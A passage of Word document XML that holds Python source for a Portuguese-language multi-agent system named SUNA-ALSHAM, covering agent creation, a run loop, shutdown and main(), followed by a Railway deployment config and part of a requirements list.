        <w:t xml:space="preserve"> Tentando criar agente: {agent_id} ({agent_class.__name__}) - {description}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4411502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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E00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agent_class in [SelfEvolvingAgent, AIOptimizationAgent]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B571F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redis_url = os.getenv("REDIS_URL", None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2C9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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Criando {agent_class.__name__} com REDIS_URL: {'configurada' if redis_url else 'não configurada'}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649F4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agent = agent_class(agent_id, self.network.message_bus, redis_url=redis_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A02C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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12895AA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agent = agent_class(agent_id, self.network.message_bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A682BF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self.network.add_agent(agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B4E0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self.agents[agent_id] = agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DAF0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successful_agents += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050476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Agente {agent_id} ({agent_class.__name__}) criado e adicionado com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D02C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hasattr(agent, 'capabilities') and agent.capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47494FB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capabilities = [cap.name for cap in agent.capabilities]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285334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logger.info(f"   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Capacidades: {', '.join(capabilities)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0CB2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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BFA2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failed_agents += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F27DB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criando agente {agent_id} ({agent_class.__name__}): {str(e)}", exc_info=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727D4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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E190F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284086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logger.info("=" * 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4432E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RESUMO DA CRIAÇÃO DE AGENTES")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1962E5E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logger.info("=" * 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A71C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Agentes criados com sucesso: {successful_agents}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B0B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Agentes que falharam: {failed_agents}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3034AB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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Taxa de sucesso: {(successful_agents/(successful_agents+failed_agents)*100):.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2398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3D871A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successful_agents == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311CFB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CR</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TICO: Nenhum agente foi criado com sucesso!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5A60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raise Exception("Falha na criação de todos os agentes")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F245C0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0EC0A1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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Total de {successful_agents} agentes especializados criados e prontos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4C8E3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45F9B19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async def run_system_continuously(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F02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"""Executa o sistema continuamente com ciclos regulares"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB323B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🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando execução contínua do sistema")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426CDF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65CE717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while self.is_running and not self.shutdown_requested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3350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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1676F94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current_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4522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elapsed = current_time - self.start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10376A9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3900189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int(elapsed) % 30 == 0 and int(elapsed) &gt; 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD140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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema em andamento: {int(elapsed/60)} minuto(s) de uptime")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5437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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE991D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network_status = self.network.get_network_status()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D5AC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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Status da rede: {network_status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE10E9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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F97F7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logger.warning(f"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Erro coletando status da rede: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BAC2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54284FA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active_agents = sum(1 for agent in self.agents.values() if hasattr(agent, 'status') and agent.status == 'running')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29847A5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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🤖</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Agentes ativos: {active_agents}/{len(self.agents)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55DF5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2B665CAF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if int(elapsed) % 60 == 0 and int(elapsed) &gt; 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE690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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema operando normalmente - {int(elapsed/60)} minuto(s) de uptime")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0F5DD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67902BC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await asyncio.sleep(300)  # 5 minutos por ciclo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ECDC0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39C26EE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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73259D1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durante execu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 cont</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nua: {e}", exc_info=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05092B6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await asyncio.sleep(5)  # Pausa antes de tentar novamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD35F3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6F9B04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def shutdown_system(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EC7D1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"""Desliga o sistema de forma segura"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1286D6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🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando shutdown graceful do sistema...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE708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self.is_running = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60798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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F234B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for agent_id, agent in self.agents.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782642B4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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED9FCE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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏹️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Parando agente {agent_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC74FE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if hasattr(agent, 'stop'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852319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    agent.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445E0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logger.debug(f"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Agente {agent_id} parado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C161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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CBA8B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    logger.warning(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro parando agente {agent_id}: {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30137F85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70FD66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if self.network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0F3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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏹️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Parando rede multi-agente...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9823A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self.network.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C2B1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    logger.info("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Rede multi-agente parada")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372DC30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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FF42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uptime = (datetime.now() - self.start_time).total_seconds()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20666BBD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logger.info(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏰</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tempo total de opera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o: {uptime:.2f} segundos")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FF6F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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema SUNA-ALSHAM encerrado com sucesso")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2629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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BDBE56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durante shutdown: {e}", exc_info=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B9D9E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051A8EF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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EB680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"""Função principal do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002CDA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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌟</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> INICIANDO SUNA-ALSHAM MULTI-AGENT SYSTEM v2.0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697615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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Versão corrigida com melhorias dos colaboradores")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E4E4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logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📅</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciado em: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508EB7F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33557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system_manager = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262A9EB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D879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system_manager = EnhancedSystemManager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE7A9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not system_manager.initialize_system():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B56320E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logger.error("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Falha cr</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tica na inicializa</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o do sistema")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB2970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sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41018C2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736B4FB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⏱️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Iniciando execução contínua")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD461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asyncio.run(system_manager.run_system_continuously())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6C5E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47724DBC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except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071D0EF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🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Interrupção pelo usuário (Ctrl+C)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3381A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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421BFD49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logger.error(f"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Erro cr</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tico no sistema: {str(e)}", exc_info=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0AA12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raise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E193D98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finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CCDE1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if system_manager:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38530C87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    system_manager.shutdown_system()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65145E1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    logger.info("</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>👋</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Multi-Agent System finalizado")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969E03C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCC35C3" w14:textId="77777777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t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7BC69" w14:textId="369B478C" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A1234D" w14:textId="68B0BB0D" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599E2FCB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6CEB30" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301124FD" w14:textId="04DA1D4A" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>railway.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712B9D2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"build": {</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"builder": "NIXPACKS"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>},</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"deploy": {</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"restartPolicyType": "ON_FAILURE",</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"restartPolicyMaxRetries": 3</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>},</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"environments": {</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"production": {</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"variables": {</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"ENVIRONMENT": "production",</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"LOG_LEVEL": "INFO",</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"REDIS_URL": "${{Redis.REDIS_URL}}",</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>"DATABASE_URL": "${{Postgres.DATABASE_URL}}"</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FFC26" w14:textId="42292BFB" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A504A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED2D270" w14:textId="4665A47B" w:rsidR="006D02FF" w:rsidRDefault="000F7565" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B959D38" w14:textId="77777777" w:rsidR="000F7565" w:rsidRPr="000F7565" w:rsidRDefault="000F7565" w:rsidP="000F7565">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7565">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>redis&gt;=4.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BD569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openai&gt;=1.13.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB0CD2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numpy&gt;=1.26.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC392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uvicorn&gt;=0.23.2</w:t>
      </w:r>
    </w:p>
